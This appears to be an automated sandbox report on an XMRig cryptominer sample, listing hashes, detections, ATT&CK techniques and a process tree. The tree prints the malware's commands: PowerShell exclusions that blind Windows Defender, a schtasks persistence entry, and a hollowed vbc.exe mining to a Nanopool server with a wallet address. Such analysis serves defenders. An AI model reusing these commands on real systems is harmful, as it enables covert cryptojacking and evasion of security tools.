xmrig | 9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

Analysis

max time kernel
94s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
18/12/2022, 07:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2637eb34ee0e5131f80452b12bbdddba.exe
Size

2.0MB
MD5

2637eb34ee0e5131f80452b12bbdddba
SHA1

39305d513cffc1bf6b8a20cdd912532ade05a7ed
SHA256

9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7
SHA512

0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b
SSDEEP

49152:cpFtPeFTefWNTt0dYMuZDGmA9MUy41+hrDy:cpWeulpZa/l1m2

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/3368-190-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/3368-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3368-191-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3368-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3368-194-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/3368-199-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1808	GAPOSUR.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	GAPOSUR.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1808 set thread context of 3368	1808	GAPOSUR.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3420	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2500	timeout.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4424	2637eb34ee0e5131f80452b12bbdddba.exe
4424	2637eb34ee0e5131f80452b12bbdddba.exe
1112	powershell.exe
1028	powershell.exe
1028	powershell.exe
1112	powershell.exe
1808	GAPOSUR.exe
1808	GAPOSUR.exe
2272	powershell.exe
3724	powershell.exe
3724	powershell.exe
2272	powershell.exe
1808	GAPOSUR.exe
1808	GAPOSUR.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4424	2637eb34ee0e5131f80452b12bbdddba.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	1808	GAPOSUR.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	3724	powershell.exe
Token: SeLockMemoryPrivilege	3368	vbc.exe
Token: SeLockMemoryPrivilege	3368	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3368	vbc.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 4424 wrote to memory of 1028	4424	2637eb34ee0e5131f80452b12bbdddba.exe	79
PID 4424 wrote to memory of 1028	4424	2637eb34ee0e5131f80452b12bbdddba.exe	79
PID 4424 wrote to memory of 1112	4424	2637eb34ee0e5131f80452b12bbdddba.exe	80
PID 4424 wrote to memory of 1112	4424	2637eb34ee0e5131f80452b12bbdddba.exe	80
PID 4424 wrote to memory of 668	4424	2637eb34ee0e5131f80452b12bbdddba.exe	83
PID 4424 wrote to memory of 668	4424	2637eb34ee0e5131f80452b12bbdddba.exe	83
PID 668 wrote to memory of 2500	668	cmd.exe	85
PID 668 wrote to memory of 2500	668	cmd.exe	85
PID 668 wrote to memory of 1808	668	cmd.exe	86
PID 668 wrote to memory of 1808	668	cmd.exe	86
PID 1808 wrote to memory of 2272	1808	GAPOSUR.exe	87
PID 1808 wrote to memory of 2272	1808	GAPOSUR.exe	87
PID 1808 wrote to memory of 3724	1808	GAPOSUR.exe	89
PID 1808 wrote to memory of 3724	1808	GAPOSUR.exe	89
PID 1808 wrote to memory of 1988	1808	GAPOSUR.exe	92
PID 1808 wrote to memory of 1988	1808	GAPOSUR.exe	92
PID 1988 wrote to memory of 3420	1988	cmd.exe	94
PID 1988 wrote to memory of 3420	1988	cmd.exe	94
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98
PID 1808 wrote to memory of 3368	1808	GAPOSUR.exe	98

C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe
"C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5B63.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2500
- - C:\ProgramData\cloud\GAPOSUR.exe
    "C:\ProgramData\cloud\GAPOSUR.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3724
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3420
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:3368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\cloud\GAPOSUR.exe

Filesize
2.0MB

MD5
2637eb34ee0e5131f80452b12bbdddba

SHA1
39305d513cffc1bf6b8a20cdd912532ade05a7ed

SHA256
9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

SHA512
0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

Download Submit
C:\ProgramData\cloud\GAPOSUR.exe

Filesize
2.0MB

MD5
2637eb34ee0e5131f80452b12bbdddba

SHA1
39305d513cffc1bf6b8a20cdd912532ade05a7ed

SHA256
9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7

SHA512
0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f41f42c322498af0591f396c59dd4304

SHA1
e1e5aa68d73d48bc5e743a34f6c0fa8960ff7514

SHA256
d8bd9a4a363ff2ac2dc887759ec6ba4215a4ce0925a8fb9c531573458ee4a31c

SHA512
2328a1b402b4fb0de9c451fb630eab58549129d3bcfb70b9834cfbd16065ebaadec006b309ea17ac182d34c53e01705cbc9e0196eb0cbd62600c866e79a1844f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5B63.tmp.bat

Filesize
141B

MD5
238cc86d424eddae03e0215fc294dad3

SHA1
a0caa068fc4d565feab3c9d9bae7fb0a69f81ca3

SHA256
8196a268e7c41fa4d8e14670e3b81b33357d1746631e7faa11b1ab7c1b7a5d80

SHA512
47c94bc0cf9d6ae4ee956c986dbcc3347cc5521400c1f9614be39c26871f61e21d0240a3e989ef6e3f8107ff40e284884a53938f922628670ca514587045b8d3

Download Submit
memory/1028-156-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1028-151-0x000002C24AA00000-0x000002C24AA22000-memory.dmp

Filesize
136KB

Download
memory/1112-157-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1808-170-0x00007FF9C5A70000-0x00007FF9C5A9B000-memory.dmp

Filesize
172KB

Download
memory/1808-171-0x0000000000370000-0x00000000005CE000-memory.dmp

Filesize
2.4MB

Download
memory/1808-201-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1808-200-0x0000000000370000-0x00000000005CE000-memory.dmp

Filesize
2.4MB

Download
memory/1808-197-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1808-196-0x0000000002B20000-0x0000000002B63000-memory.dmp

Filesize
268KB

Download
memory/1808-195-0x0000000000370000-0x00000000005CE000-memory.dmp

Filesize
2.4MB

Download
memory/1808-188-0x00007FF9C4460000-0x00007FF9C449B000-memory.dmp

Filesize
236KB

Download
memory/1808-186-0x00007FF9C7800000-0x00007FF9C786B000-memory.dmp

Filesize
428KB

Download
memory/1808-184-0x00007FF9A3D70000-0x00007FF9A3E72000-memory.dmp

Filesize
1.0MB

Download
memory/1808-183-0x00007FF9A3D30000-0x00007FF9A3D65000-memory.dmp

Filesize
212KB

Download
memory/1808-181-0x00007FF9C5090000-0x00007FF9C50B7000-memory.dmp

Filesize
156KB

Download
memory/1808-177-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1808-172-0x00007FF9AA000000-0x00007FF9AA14E000-memory.dmp

Filesize
1.3MB

Download
memory/1808-162-0x00007FF9AAE60000-0x00007FF9AAF0A000-memory.dmp

Filesize
680KB

Download
memory/1808-163-0x00007FF9C7760000-0x00007FF9C77FE000-memory.dmp

Filesize
632KB

Download
memory/1808-164-0x00007FF9C2FB0000-0x00007FF9C2FC2000-memory.dmp

Filesize
72KB

Download
memory/1808-165-0x00007FF9AADA0000-0x00007FF9AAE5D000-memory.dmp

Filesize
756KB

Download
memory/1808-166-0x00007FF9C6A10000-0x00007FF9C6BB1000-memory.dmp

Filesize
1.6MB

Download
memory/1808-168-0x0000000000370000-0x00000000005CE000-memory.dmp

Filesize
2.4MB

Download
memory/1808-167-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/1808-169-0x0000000002B20000-0x0000000002B63000-memory.dmp

Filesize
268KB

Download
memory/2272-185-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/2272-179-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/3368-199-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3368-203-0x000001EFC6E10000-0x000001EFC6E30000-memory.dmp

Filesize
128KB

Download
memory/3368-202-0x000001EFC6DF0000-0x000001EFC6E10000-memory.dmp

Filesize
128KB

Download
memory/3368-204-0x000001EFC6DF0000-0x000001EFC6E10000-memory.dmp

Filesize
128KB

Download
memory/3368-205-0x000001EFC6E10000-0x000001EFC6E30000-memory.dmp

Filesize
128KB

Download
memory/3368-198-0x000001EFC6DB0000-0x000001EFC6DF0000-memory.dmp

Filesize
256KB

Download
memory/3368-194-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3368-193-0x000001EFC6D60000-0x000001EFC6D80000-memory.dmp

Filesize
128KB

Download
memory/3368-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3368-191-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3368-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/3724-178-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/3724-187-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/4424-143-0x00007FF9AA000000-0x00007FF9AA14E000-memory.dmp

Filesize
1.3MB

Download
memory/4424-133-0x00007FF9AAE60000-0x00007FF9AAF0A000-memory.dmp

Filesize
680KB

Download
memory/4424-139-0x00007FF9C6A10000-0x00007FF9C6BB1000-memory.dmp

Filesize
1.6MB

Download
memory/4424-137-0x0000000000E00000-0x000000000105E000-memory.dmp

Filesize
2.4MB

Download
memory/4424-142-0x0000000000E00000-0x000000000105E000-memory.dmp

Filesize
2.4MB

Download
memory/4424-138-0x0000000001460000-0x00000000014A3000-memory.dmp

Filesize
268KB

Download
memory/4424-150-0x0000000000E00000-0x000000000105E000-memory.dmp

Filesize
2.4MB

Download
memory/4424-134-0x00007FF9C7760000-0x00007FF9C77FE000-memory.dmp

Filesize
632KB

Download
memory/4424-140-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/4424-149-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/4424-148-0x0000000001460000-0x00000000014A3000-memory.dmp

Filesize
268KB

Download
memory/4424-136-0x00007FF9AADA0000-0x00007FF9AAE5D000-memory.dmp

Filesize
756KB

Download
memory/4424-144-0x00007FF9A9160000-0x00007FF9A9C21000-memory.dmp

Filesize
10.8MB

Download
memory/4424-135-0x00007FF9C2FB0000-0x00007FF9C2FC2000-memory.dmp

Filesize
72KB

Download
memory/4424-141-0x00007FF9C5A70000-0x00007FF9C5A9B000-memory.dmp

Filesize
172KB

Download